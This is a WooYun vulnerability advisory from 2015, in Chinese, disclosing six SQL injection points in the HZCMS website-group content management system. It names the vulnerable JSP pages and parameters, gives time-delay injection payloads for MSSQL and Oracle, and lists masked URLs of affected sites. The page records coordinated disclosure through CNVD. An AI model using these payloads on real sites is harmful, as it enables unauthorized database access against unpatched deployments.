当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145426

漏洞标题:合正协同内容管理系统6个SQL注入

相关厂商:北京合正软件有限公司

漏洞作者: 路人甲

提交时间:2015-10-09 15:31

修复时间:2016-01-11 17:54

公开时间:2016-01-11 17:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-09: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经确认,细节仅向厂商公开
2015-10-16: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

现在挖漏洞都不是挖了,而是打包了

详细说明:

 北京合正软件有限公司开发的合正网站群内容管理系统HZCMS是一套基于Java和XML技术的网站群内容管理软件,基于面向服务体系架构设计和平台化、组件化的模式开发,实现了网站内容的采集、编辑、制作、管理、发布、运营和分析的全流程管理,可以轻松灵活建立政府和企业站点群,集中管理,分级授权,支持站群间的信息交换和共享。 系统既适用于独立的网站建设,又支持多级别、横向或纵向的虚拟网站群,并在技术上实现了多网站之间多数据库管理,彻底解决了组织对内、对外、本地与异地、多部门、多网站之间的网络互通、内容整合;加快了信息、内容、知识的积累和流通,使得非专业人员协同、高效、简单、智能的维护管理站点群。      
 官网列举的部分案例:[官网只是枚举部分,实际案例不止这些,有很多!] 比如:用友软件、国家奥林匹克体育中心、中国物流信息中心河南省统计局、河南省交通厅、河南省财政厅等大型站点。

1.png


后台:

02.png


SQL Injection:[数据有MSSQL和Oracle两种,基本都支持时间注入]

1、/cms/cms/infopub/gjjs.jsp    templetid参数存在注入
2、/cms/cms/infopub/search.jsp  templetid参数存在注入
3、/cms/ad/openad.jsp?adid=1    adid参数存在注入
4、/cms/cms/infopub/rss.jsp     channelcode参数存在注入
5、/cms/wcmvote/viewvote.jsp    voteId参数存在注入
6、/cms/cms/infopub/resultmulfields.jsp templetid参数存在注入


测试Payload:

MSSQL延迟测试:' WAITFOR DELAY '0:0:5'--
Oracle延迟测试:' AND 8880=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(112)||CHR(106)||CHR(107),5) AND 'bHxV'='bHxV


Case:

mask 区域 
*****案^*****
1.http://**.**.**/cms/cms/infopub/gjjs.jsppubtype=S&pubpath=dkt&startdate=111111&enddate=111111topic=11111&content=11111&authorname=11111&origin=111111&description=84&webappcode=A02&searchdir=A02&templetid=1_
2.http://**.**.**/cms/cms/infopub/gjjs.jsppubtype=S&pubpath=dkt&startdate=111111&enddate=111111topic=11111&content=11111&authorname=11111&origin=111111&description=84&webappcode=A02&searchdir=A02&templetid=1_
*****11&content=11111&authorname=11111&origin=111*****
3.http://**.**.**/cms/cms/infopub/gjjs.jsppubtype=S&pubpath=dkt&startdate=111111&enddate=111111topic=11111&content=11111&authorname=11111&origin=111111&description=84&webappcode=A02&searchdir=A02&templetid=1_
4.http://**.**.**/cms/cms/infopub/gjjs.jsppubtype=S&pubpath=dkt&startdate=111111&enddate=111111topic=11111&content=11111&authorname=11111&origin=111111&description=84&webappcode=A02&searchdir=A02&templetid=1_
**********
*****案^*****
5.http://**.**.**/cms/cms/infopub/search.jsppubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1_
6.http://**.**.**/cms/cms/infopub/search.jsppubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1_
7.http://**.**.**/cms/cms/infopub/search.jsppubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1_
8.http://**.**.**/cms/cms/infopub/search.jsppubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1_
9.http://**.**.**/cms/cms/infopub/search.jsppubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1_
**********
*****案^*****
10.http://**.**.**/cms/ad/openad.jspadid=1_
11.http://**.**.**/cms/ad/openad.jspadid=1_
*****d/openad.*****
12.http://**.**.**/cms/ad/openad.jspadid=1_
13.http://**.**.**/cms/ad/openad.jspadid=1_
**********
*****案^*****
14.http://**.**.**/cms/cms/infopub/rss.jspchannelcode=A1228&maxnum=20_
15.http://**.**.**/cms/cms/infopub/rss.jspchannelcode=1&maxnum=20_
16.http://**.**.**/cms/cms/infopub/rss.jspchannelcode=1&maxnum=20_
17.http://**.**.**/cms/cms/infopub/rss.jspchannelcode=1&maxnum=20_
18.http://**.**.**/cms/cms/infopub/rss.jspchannelcode=1&maxnum=20_
**********
**********
*****案^*****
19.http://**.**.**/cms/wcmvote/viewvote.jspvoteId=1_
20.http://**.**.**/cms/wcmvote/viewvote.jspvoteId=1_
21.http://**.**.**/cms/wcmvote/viewvote.jspvoteId=1_
22.http://**.**.**/cms/wcmvote/viewvote.jspvoteId=1_
23.http://**.**.**/cms/wcmvote/viewvote.jspvoteId=1_
**********
*****案^*****
24.http://**.**.**/cms/cms/infopub/resultmulfields.jsppubtype=S&cxfld=a3%5E&pubpath=portal&keywords=%BB%DD%C6%D5%5E&channel=A0804&templetid=1213354216336211_
25.http://**.**.**/cms/cms/infopub/resultmulfields.jsppubtype=S&startdate=startdate&enddate=enddate&newkeywords=&cxfld=a1%5Ea2%5Ea3%5Ea4%5E&pubpath=zsrk&keywords=null%5Enull%5E%B9%DC%B2%C4%D3%EB%B9%DC%BC%FE%5Enull%5E&channel=A480301&templetid=1423723308286499_
26.http://**.**.**/cms/cms/infopub/resultmulfields.jsppubtype=S&startdate=startdate&enddate=enddate&newkeywords=&cxfld=a1%5Ea2%5Ea3%5Ea4%5E&pubpath=zsrk&keywords=null%5Enull%5E%B9%DC%B2%C4%D3%EB%B9%DC%BC%FE%5Enull%5E&channel=A480301&templetid=1423723308286499_
*****%5Ea2%5Ea3%5Ea4%5E&pubpath=zsrk&keywords=null%5Enull%5E%B9*****
27.http://**.**.**/cms/cms/infopub/resultmulfields.jsppubtype=S&startdate=startdate&enddate=enddate&newkeywords=&cxfld=a1%5Ea2%5Ea3%5Ea4%5E&pubpath=zsrk&keywords=null%5Enull%5E%B9%DC%B2%C4%D3%EB%B9%DC%BC%FE%5Enull%5E&channel=A480301&templetid=1423723308286499

漏洞证明:

Security Testing:
本页漏洞内容仅为漏洞报告交由CNCERT/CNVD通知厂商处理,并非利用方法,请勿仿照漏洞报告进行恶意攻击入侵站点,由此带来的后果,漏洞作者概不负责!

第一处证明:/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=111111&enddate=111111&topic=111111&content=111111&authorname=111111&origin=111111&description=111111&webappcode=A02&searchdir=A02&templetid=1241486749927709 
01.jpg







02.jpg






03.jpg




第二处证明:/cms/cms/infopub/search.jsp?pubtype=S&pubpath=dkt&display=0&relation=0&model=1&keyword=1111&webappcode=A02&templetid=1



04.jpg







05.jpg







06.jpg




第三处证明:/cms/ad/openad.jsp?adid=1



09.jpg







07.jpg







08.jpg




第四处证明:/cms/cms/infopub/rss.jsp?channelcode=A1228&maxnum=20



10.jpg







11.jpg




第五处证明:/cms/wcmvote/viewvote.jsp?voteId=1



12.jpg







13.jpg







14.jpg




第六处证明:/cms/cms/infopub/resultmulfields.jsp?pubtype=S&startdate=startdate&enddate=enddate&newkeywords=&cxfld=a1%5Ea2%5Ea3%5Ea4%5E&pubpath=zsrk&keywords=null%5Enull%5E%B9%DC%B2%C4%D3%EB%B9%DC%BC%FE%5Enull%5E&channel=A480301&templetid=1



20.jpg







17.jpg







18.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-10-13 17:53

厂商回复:


CNVD确认并复现所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。 同时发赛尔网络和相应分中心处置。

最新状态:

暂无